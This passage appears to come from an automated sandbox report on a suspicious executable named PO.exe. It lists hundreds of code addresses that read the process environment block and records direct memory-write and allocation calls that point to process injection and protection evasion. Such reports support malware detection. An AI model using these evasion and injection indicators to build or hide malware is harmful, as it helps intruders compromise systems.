                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700770 mov eax, dword ptr fs:[00000030h]2_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8770 mov eax, dword ptr fs:[00000030h]2_2_016F8770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01774755 mov eax, dword ptr fs:[00000030h]2_2_01774755
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732750 mov eax, dword ptr fs:[00000030h]2_2_01732750
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732750 mov eax, dword ptr fs:[00000030h]2_2_01732750
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177E75D mov eax, dword ptr fs:[00000030h]2_2_0177E75D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172674D mov esi, dword ptr fs:[00000030h]2_2_0172674D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172674D mov eax, dword ptr fs:[00000030h]2_2_0172674D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172674D mov eax, dword ptr fs:[00000030h]2_2_0172674D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0750 mov eax, dword ptr fs:[00000030h]2_2_016F0750
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176C730 mov eax, dword ptr fs:[00000030h]2_2_0176C730
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172273C mov eax, dword ptr fs:[00000030h]2_2_0172273C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172273C mov ecx, dword ptr fs:[00000030h]2_2_0172273C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172273C mov eax, dword ptr fs:[00000030h]2_2_0172273C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C720 mov eax, dword ptr fs:[00000030h]2_2_0172C720
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C720 mov eax, dword ptr fs:[00000030h]2_2_0172C720
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01720710 mov eax, dword ptr fs:[00000030h]2_2_01720710
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C700 mov eax, dword ptr fs:[00000030h]2_2_0172C700
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0710 mov eax, dword ptr fs:[00000030h]2_2_016F0710
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F47FB mov eax, dword ptr fs:[00000030h]2_2_016F47FB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F47FB mov eax, dword ptr fs:[00000030h]2_2_016F47FB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177E7E1 mov eax, dword ptr fs:[00000030h]2_2_0177E7E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017127ED mov eax, dword ptr fs:[00000030h]2_2_017127ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017127ED mov eax, dword ptr fs:[00000030h]2_2_017127ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017127ED mov eax, dword ptr fs:[00000030h]2_2_017127ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FC7C0 mov eax, dword ptr fs:[00000030h]2_2_016FC7C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017707C3 mov eax, dword ptr fs:[00000030h]2_2_017707C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F07AF mov eax, dword ptr fs:[00000030h]2_2_016F07AF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A47A0 mov eax, dword ptr fs:[00000030h]2_2_017A47A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179678E mov eax, dword ptr fs:[00000030h]2_2_0179678E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01722674 mov eax, dword ptr fs:[00000030h]2_2_01722674
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A660 mov eax, dword ptr fs:[00000030h]2_2_0172A660
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A660 mov eax, dword ptr fs:[00000030h]2_2_0172A660
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B866E mov eax, dword ptr fs:[00000030h]2_2_017B866E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B866E mov eax, dword ptr fs:[00000030h]2_2_017B866E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170C640 mov eax, dword ptr fs:[00000030h]2_2_0170C640
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F262C mov eax, dword ptr fs:[00000030h]2_2_016F262C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01726620 mov eax, dword ptr fs:[00000030h]2_2_01726620
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01728620 mov eax, dword ptr fs:[00000030h]2_2_01728620
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E627 mov eax, dword ptr fs:[00000030h]2_2_0170E627
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01732619 mov eax, dword ptr fs:[00000030h]2_2_01732619
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170260B mov eax, dword ptr fs:[00000030h]2_2_0170260B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E609 mov eax, dword ptr fs:[00000030h]2_2_0176E609
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E6F2 mov eax, dword ptr fs:[00000030h]2_2_0176E6F2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E6F2 mov eax, dword ptr fs:[00000030h]2_2_0176E6F2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E6F2 mov eax, dword ptr fs:[00000030h]2_2_0176E6F2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E6F2 mov eax, dword ptr fs:[00000030h]2_2_0176E6F2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017706F1 mov eax, dword ptr fs:[00000030h]2_2_017706F1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017706F1 mov eax, dword ptr fs:[00000030h]2_2_017706F1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0172A6C7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A6C7 mov eax, dword ptr fs:[00000030h]2_2_0172A6C7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017266B0 mov eax, dword ptr fs:[00000030h]2_2_017266B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C6A6 mov eax, dword ptr fs:[00000030h]2_2_0172C6A6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4690 mov eax, dword ptr fs:[00000030h]2_2_016F4690
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4690 mov eax, dword ptr fs:[00000030h]2_2_016F4690
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794978 mov eax, dword ptr fs:[00000030h]2_2_01794978
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794978 mov eax, dword ptr fs:[00000030h]2_2_01794978
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C97C mov eax, dword ptr fs:[00000030h]2_2_0177C97C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01716962 mov eax, dword ptr fs:[00000030h]2_2_01716962
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01716962 mov eax, dword ptr fs:[00000030h]2_2_01716962
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01716962 mov eax, dword ptr fs:[00000030h]2_2_01716962
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173096E mov eax, dword ptr fs:[00000030h]2_2_0173096E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173096E mov edx, dword ptr fs:[00000030h]2_2_0173096E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173096E mov eax, dword ptr fs:[00000030h]2_2_0173096E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770946 mov eax, dword ptr fs:[00000030h]2_2_01770946
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0178892B mov eax, dword ptr fs:[00000030h]2_2_0178892B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177892A mov eax, dword ptr fs:[00000030h]2_2_0177892A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C912 mov eax, dword ptr fs:[00000030h]2_2_0177C912
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8918 mov eax, dword ptr fs:[00000030h]2_2_016E8918
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8918 mov eax, dword ptr fs:[00000030h]2_2_016E8918
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E908 mov eax, dword ptr fs:[00000030h]2_2_0176E908
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E908 mov eax, dword ptr fs:[00000030h]2_2_0176E908
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017229F9 mov eax, dword ptr fs:[00000030h]2_2_017229F9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017229F9 mov eax, dword ptr fs:[00000030h]2_2_017229F9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177E9E0 mov eax, dword ptr fs:[00000030h]2_2_0177E9E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017249D0 mov eax, dword ptr fs:[00000030h]2_2_017249D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA9D3 mov eax, dword ptr fs:[00000030h]2_2_017BA9D3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017869C0 mov eax, dword ptr fs:[00000030h]2_2_017869C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA9D0 mov eax, dword ptr fs:[00000030h]2_2_016FA9D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F09AD mov eax, dword ptr fs:[00000030h]2_2_016F09AD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F09AD mov eax, dword ptr fs:[00000030h]2_2_016F09AD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017789B3 mov esi, dword ptr fs:[00000030h]2_2_017789B3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017789B3 mov eax, dword ptr fs:[00000030h]2_2_017789B3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017789B3 mov eax, dword ptr fs:[00000030h]2_2_017789B3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A0 mov eax, dword ptr fs:[00000030h]2_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177E872 mov eax, dword ptr fs:[00000030h]2_2_0177E872
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177E872 mov eax, dword ptr fs:[00000030h]2_2_0177E872
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786870 mov eax, dword ptr fs:[00000030h]2_2_01786870
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786870 mov eax, dword ptr fs:[00000030h]2_2_01786870
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01720854 mov eax, dword ptr fs:[00000030h]2_2_01720854
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01702840 mov ecx, dword ptr fs:[00000030h]2_2_01702840
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4859 mov eax, dword ptr fs:[00000030h]2_2_016F4859
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4859 mov eax, dword ptr fs:[00000030h]2_2_016F4859
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A830 mov eax, dword ptr fs:[00000030h]2_2_0172A830
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179483A mov eax, dword ptr fs:[00000030h]2_2_0179483A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179483A mov eax, dword ptr fs:[00000030h]2_2_0179483A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov eax, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov eax, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov eax, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov ecx, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov eax, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712835 mov eax, dword ptr fs:[00000030h]2_2_01712835
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C810 mov eax, dword ptr fs:[00000030h]2_2_0177C810
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C8F9 mov eax, dword ptr fs:[00000030h]2_2_0172C8F9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C8F9 mov eax, dword ptr fs:[00000030h]2_2_0172C8F9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA8E4 mov eax, dword ptr fs:[00000030h]2_2_017BA8E4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E8C0 mov eax, dword ptr fs:[00000030h]2_2_0171E8C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0887 mov eax, dword ptr fs:[00000030h]2_2_016F0887
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C89D mov eax, dword ptr fs:[00000030h]2_2_0177C89D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016ECB7E mov eax, dword ptr fs:[00000030h]2_2_016ECB7E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179EB50 mov eax, dword ptr fs:[00000030h]2_2_0179EB50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A4B4B mov eax, dword ptr fs:[00000030h]2_2_017A4B4B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A4B4B mov eax, dword ptr fs:[00000030h]2_2_017A4B4B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786B40 mov eax, dword ptr fs:[00000030h]2_2_01786B40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786B40 mov eax, dword ptr fs:[00000030h]2_2_01786B40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BAB40 mov eax, dword ptr fs:[00000030h]2_2_017BAB40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01798B42 mov eax, dword ptr fs:[00000030h]2_2_01798B42
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171EB20 mov eax, dword ptr fs:[00000030h]2_2_0171EB20
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171EB20 mov eax, dword ptr fs:[00000030h]2_2_0171EB20
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B8B28 mov eax, dword ptr fs:[00000030h]2_2_017B8B28
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B8B28 mov eax, dword ptr fs:[00000030h]2_2_017B8B28
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176EB1D mov eax, dword ptr fs:[00000030h]2_2_0176EB1D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177CBF0 mov eax, dword ptr fs:[00000030h]2_2_0177CBF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171EBFC mov eax, dword ptr fs:[00000030h]2_2_0171EBFC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8BF0 mov eax, dword ptr fs:[00000030h]2_2_016F8BF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8BF0 mov eax, dword ptr fs:[00000030h]2_2_016F8BF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8BF0 mov eax, dword ptr fs:[00000030h]2_2_016F8BF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0BCD mov eax, dword ptr fs:[00000030h]2_2_016F0BCD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0BCD mov eax, dword ptr fs:[00000030h]2_2_016F0BCD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0BCD mov eax, dword ptr fs:[00000030h]2_2_016F0BCD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179EBD0 mov eax, dword ptr fs:[00000030h]2_2_0179EBD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01710BCB mov eax, dword ptr fs:[00000030h]2_2_01710BCB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01710BCB mov eax, dword ptr fs:[00000030h]2_2_01710BCB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01710BCB mov eax, dword ptr fs:[00000030h]2_2_01710BCB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A4BB0 mov eax, dword ptr fs:[00000030h]2_2_017A4BB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A4BB0 mov eax, dword ptr fs:[00000030h]2_2_017A4BB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700BBE mov eax, dword ptr fs:[00000030h]2_2_01700BBE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700BBE mov eax, dword ptr fs:[00000030h]2_2_01700BBE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176CA72 mov eax, dword ptr fs:[00000030h]2_2_0176CA72
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176CA72 mov eax, dword ptr fs:[00000030h]2_2_0176CA72
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179EA60 mov eax, dword ptr fs:[00000030h]2_2_0179EA60
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172CA6F mov eax, dword ptr fs:[00000030h]2_2_0172CA6F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172CA6F mov eax, dword ptr fs:[00000030h]2_2_0172CA6F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172CA6F mov eax, dword ptr fs:[00000030h]2_2_0172CA6F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700A5B mov eax, dword ptr fs:[00000030h]2_2_01700A5B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700A5B mov eax, dword ptr fs:[00000030h]2_2_01700A5B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6A50 mov eax, dword ptr fs:[00000030h]2_2_016F6A50
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01714A35 mov eax, dword ptr fs:[00000030h]2_2_01714A35
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01714A35 mov eax, dword ptr fs:[00000030h]2_2_01714A35
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172CA24 mov eax, dword ptr fs:[00000030h]2_2_0172CA24
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171EA2E mov eax, dword ptr fs:[00000030h]2_2_0171EA2E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177CA11 mov eax, dword ptr fs:[00000030h]2_2_0177CA11
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172AAEE mov eax, dword ptr fs:[00000030h]2_2_0172AAEE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172AAEE mov eax, dword ptr fs:[00000030h]2_2_0172AAEE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01724AD0 mov eax, dword ptr fs:[00000030h]2_2_01724AD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01724AD0 mov eax, dword ptr fs:[00000030h]2_2_01724AD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01746ACC mov eax, dword ptr fs:[00000030h]2_2_01746ACC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01746ACC mov eax, dword ptr fs:[00000030h]2_2_01746ACC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01746ACC mov eax, dword ptr fs:[00000030h]2_2_01746ACC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0AD0 mov eax, dword ptr fs:[00000030h]2_2_016F0AD0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8AA0 mov eax, dword ptr fs:[00000030h]2_2_016F8AA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8AA0 mov eax, dword ptr fs:[00000030h]2_2_016F8AA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01746AA4 mov eax, dword ptr fs:[00000030h]2_2_01746AA4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01728A90 mov edx, dword ptr fs:[00000030h]2_2_01728A90
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA80 mov eax, dword ptr fs:[00000030h]2_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4A80 mov eax, dword ptr fs:[00000030h]2_2_017C4A80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01788D6B mov eax, dword ptr fs:[00000030h]2_2_01788D6B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0D59 mov eax, dword ptr fs:[00000030h]2_2_016F0D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0D59 mov eax, dword ptr fs:[00000030h]2_2_016F0D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0D59 mov eax, dword ptr fs:[00000030h]2_2_016F0D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8D59 mov eax, dword ptr fs:[00000030h]2_2_016F8D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8D59 mov eax, dword ptr fs:[00000030h]2_2_016F8D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8D59 mov eax, dword ptr fs:[00000030h]2_2_016F8D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8D59 mov eax, dword ptr fs:[00000030h]2_2_016F8D59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8D59 mov eax, dword ptr fs:[00000030h]2_2_016F8D59
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeNtClose: Direct from: 0x76F02B6C
